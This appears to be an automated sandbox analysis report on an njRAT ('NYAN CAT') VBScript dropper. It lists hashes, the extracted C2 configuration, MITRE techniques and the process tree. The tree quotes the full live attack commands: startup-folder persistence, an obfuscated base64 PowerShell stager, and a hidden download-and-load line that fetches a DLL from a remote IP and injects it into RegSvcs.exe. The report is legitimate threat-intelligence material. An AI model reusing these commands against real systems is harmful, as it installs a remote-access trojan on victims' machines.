njrat | ac630699a97a8f5c8273f1531df135ae3dd88ff8bd952a5944783f044cff2871

General

Target

NJRATCASA22.vbs
Size

330KB
MD5

8a4f7794001fbe25ab1820e9a66db1da
SHA1

fd1e5582b21480d6d19b247fe71f96d500314038
SHA256

6cbb94dab89d523749b578de2590ad064049c0574476f553df9ffcf9d13ddf51
SHA512

dd5305d5613314d78972169320971021e9d98af6c7cc5b2cb494996fe275cea87ad9aa9cd4f0109b482e6bb45b88f1fedf557c82925c68b152c7da110a292751

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://192.99.190.34/dll/1.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

venomsi.mypsx.net:81

Mutex

4c6c9a1bbdc34e6ebe

Attributes

reg_key
4c6c9a1bbdc34e6ebe
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

22 1588 powershell.exe
24 1588 powershell.exe

flow	pid	process
22	1588	powershell.exe
24	1588	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1588 set thread context of 916 1588 powershell.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2696 PING.EXE

description	pid	process	target process
PID 1588 set thread context of 916	1588	powershell.exe	RegSvcs.exe

pid	process
2696	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
2636	powershell.exe
2636	powershell.exe
2636	powershell.exe
4004	powershell.exe
4004	powershell.exe
4004	powershell.exe
1588	powershell.exe
1588	powershell.exe
1588	powershell.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe
Token: 33	916	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	916	RegSvcs.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2468 wrote to memory of 3452	2468	WScript.exe	cmd.exe
PID 2468 wrote to memory of 3452	2468	WScript.exe	cmd.exe
PID 3452 wrote to memory of 2696	3452	cmd.exe	PING.EXE
PID 3452 wrote to memory of 2696	3452	cmd.exe	PING.EXE
PID 3452 wrote to memory of 2636	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 2636	3452	cmd.exe	powershell.exe
PID 2468 wrote to memory of 4004	2468	WScript.exe	powershell.exe
PID 2468 wrote to memory of 4004	2468	WScript.exe	powershell.exe
PID 4004 wrote to memory of 1588	4004	powershell.exe	powershell.exe
PID 4004 wrote to memory of 1588	4004	powershell.exe	powershell.exe
PID 1588 wrote to memory of 916	1588	powershell.exe	RegSvcs.exe
PID 1588 wrote to memory of 916	1588	powershell.exe	RegSvcs.exe
PID 1588 wrote to memory of 916	1588	powershell.exe	RegSvcs.exe
PID 1588 wrote to memory of 916	1588	powershell.exe	RegSvcs.exe
PID 1588 wrote to memory of 916	1588	powershell.exe	RegSvcs.exe
PID 1588 wrote to memory of 916	1588	powershell.exe	RegSvcs.exe
PID 1588 wrote to memory of 916	1588	powershell.exe	RegSvcs.exe
PID 1588 wrote to memory of 916	1588	powershell.exe	RegSvcs.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2468

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:3452

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:2696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DE⁂OQ⁂y⁂C4⁂OQ⁂5⁂C4⁂MQ⁂5⁂D⁂⁂Lg⁂z⁂DQ⁂LwBk⁂Gw⁂b⁂⁂v⁂DE⁂LgB0⁂Hg⁂d⁂⁂n⁂Ck⁂KQ⁂7⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBB⁂H⁂⁂c⁂BE⁂G8⁂bQBh⁂Gk⁂bgBd⁂Do⁂OgBD⁂HU⁂cgBy⁂GU⁂bgB0⁂EQ⁂bwBt⁂GE⁂aQBu⁂C4⁂T⁂Bv⁂GE⁂Z⁂⁂o⁂CQ⁂R⁂BM⁂Ew⁂KQ⁂u⁂Ec⁂ZQB0⁂FQ⁂eQBw⁂GU⁂K⁂⁂n⁂EM⁂b⁂Bh⁂HM⁂cwBM⁂Gk⁂YgBy⁂GE⁂cgB5⁂DM⁂LgBD⁂Gw⁂YQBz⁂HM⁂MQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂TwBI⁂Ho⁂Uw⁂n⁂Ck⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂WwBv⁂GI⁂agBl⁂GM⁂d⁂Bb⁂F0⁂XQ⁂g⁂Cg⁂JwB0⁂Hg⁂d⁂⁂u⁂EE⁂UwBB⁂EM⁂M⁂⁂y⁂CU⁂V⁂BB⁂FI⁂SgBO⁂D⁂⁂Mg⁂l⁂DQ⁂Ng⁂w⁂DI⁂JQBl⁂HM⁂YQBi⁂C8⁂VwBF⁂E4⁂YQBz⁂GE⁂QwBj⁂HQ⁂YQBy⁂Eo⁂Tg⁂v⁂Gc⁂cgBv⁂C4⁂NQB1⁂GU⁂LgBh⁂HM⁂cwBh⁂GM⁂d⁂Bh⁂HI⁂agBu⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://192.99.190.34/dll/1.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('OHzS').Invoke($null, [object[]] ('txt.ASAC02%TARJN02%4602%esab/WENasaCctarJN/gro.5ue.assactarjn//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1588

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:916

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
7f5a2930cb8b12a516de80086c380c1a

SHA1
0dd9d7097b76d62b8fdfddef10fd62ba0c93bbec

SHA256
6e1052416e09ae7de3cacba2f48f5546fe4437aebd3b978bcc2c4389f846bacc

SHA512
0101b3ad552959b320e88086f8204afa70966efd3959f162e824a679b19797f0bfefbf4286af0f4043a6b318656b9381da910868e26bf0598713c0b667fbb142

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a32b2e94d2fbee1464bd9e8485749671

SHA1
facfb7f592b02a3210420d626299b7ca5fa47b91

SHA256
d3bb32f00a1dac6ed6ba77391f94c1f75106f3e633faf3c5d750521d0c1ec7aa

SHA512
f242b381895a21e39ad90b526e3b005b561360ecd2d711b52cc99be7a7599a3ae617fb34dc06aac3b059f1d1453a2c697b7d7362e3bdafffada5151c55b37931

Download Submit
memory/916-168-0x0000000004A70000-0x0000000004B02000-memory.dmp

Filesize
584KB

Download
memory/916-165-0x0000000004860000-0x00000000048FC000-memory.dmp

Filesize
624KB

Download
memory/916-173-0x0000000005A40000-0x0000000005A62000-memory.dmp

Filesize
136KB

Download
memory/916-172-0x00000000059E0000-0x0000000005A00000-memory.dmp

Filesize
128KB

Download
memory/916-171-0x00000000056C0000-0x00000000056D8000-memory.dmp

Filesize
96KB

Download
memory/916-170-0x0000000004C60000-0x0000000004CC6000-memory.dmp

Filesize
408KB

Download
memory/916-169-0x0000000004A20000-0x0000000004A2A000-memory.dmp

Filesize
40KB

Download
memory/916-167-0x00000000047C0000-0x000000000485C000-memory.dmp

Filesize
624KB

Download
memory/916-161-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/916-166-0x0000000004E00000-0x00000000052FE000-memory.dmp

Filesize
5.0MB

Download
memory/1588-159-0x00000230EFCF0000-0x00000230EFCFE000-memory.dmp

Filesize
56KB

Download
memory/1588-160-0x00000230F06E0000-0x00000230F0732000-memory.dmp

Filesize
328KB

Download
memory/1588-158-0x00000230EFD46000-0x00000230EFD48000-memory.dmp

Filesize
8KB

Download
memory/1588-148-0x00000230EFD40000-0x00000230EFD42000-memory.dmp

Filesize
8KB

Download
memory/1588-150-0x00000230EFD43000-0x00000230EFD45000-memory.dmp

Filesize
8KB

Download
memory/2636-123-0x000001DC6AC40000-0x000001DC6ACB6000-memory.dmp

Filesize
472KB

Download
memory/2636-120-0x000001DC6A080000-0x000001DC6A0A2000-memory.dmp

Filesize
136KB

Download
memory/4004-133-0x000001925A5D3000-0x000001925A5D5000-memory.dmp

Filesize
8KB

Download
memory/4004-132-0x000001925A5D0000-0x000001925A5D2000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads